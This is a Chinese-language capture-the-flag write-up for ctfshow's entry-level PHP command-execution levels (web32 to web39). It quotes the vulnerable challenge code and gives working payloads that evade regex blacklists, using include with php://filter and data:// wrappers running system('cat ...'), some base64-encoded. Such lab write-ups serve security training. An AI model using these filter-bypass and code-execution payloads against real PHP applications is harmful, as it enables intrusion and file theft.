ctfshow web入門 命令執行
阿新 • • 發佈:2021-10-30
web32
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 00:56:31 # @email: [email protected] # @link: https://ctfer.com */ error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); }
這裡將(和;都禁用了 並且php中不用括號的函式有echo、print、die、include、require、include_once、require_once,
用include函式和php偽協議來讀php檔案:
playload:
?c=include$_GET[0]?>&0=php://filter/read=convert.base64-encode/resource=flag.php
然後base64解碼得到flag
32-35同理
web36
過濾了數字,將get傳參的引數換成字母即可
playload:
?c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php
web37
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 05:18:55 # @email: [email protected] # @link: https://ctfer.com*/ //flag in flag.php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ include($c); echo $flag; } }else{ highlight_file(__FILE__); }
檔案包含get傳入的值,利用偽協議讀flag
playoad:
?c=data://text/plain,<?php system("cat f*"); 或者
?c=data://text/plain,<?php system("cat fla*")?>
web38
多過濾了兩個字元file和php,使用php短標籤進行繞過
或者base64編碼繞過
?c=data://text/plain,<?= system("cat fla*")?>
?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs=
web39
if(!preg_match("/flag/i", $c)){ include($c.".php");
data://text/plain, 這樣就相當於執行了php語句 .php 因為前面的php語句已經閉合了,所以後面的.php會被當成html頁面直接顯示在頁面上,起不到什麼 作用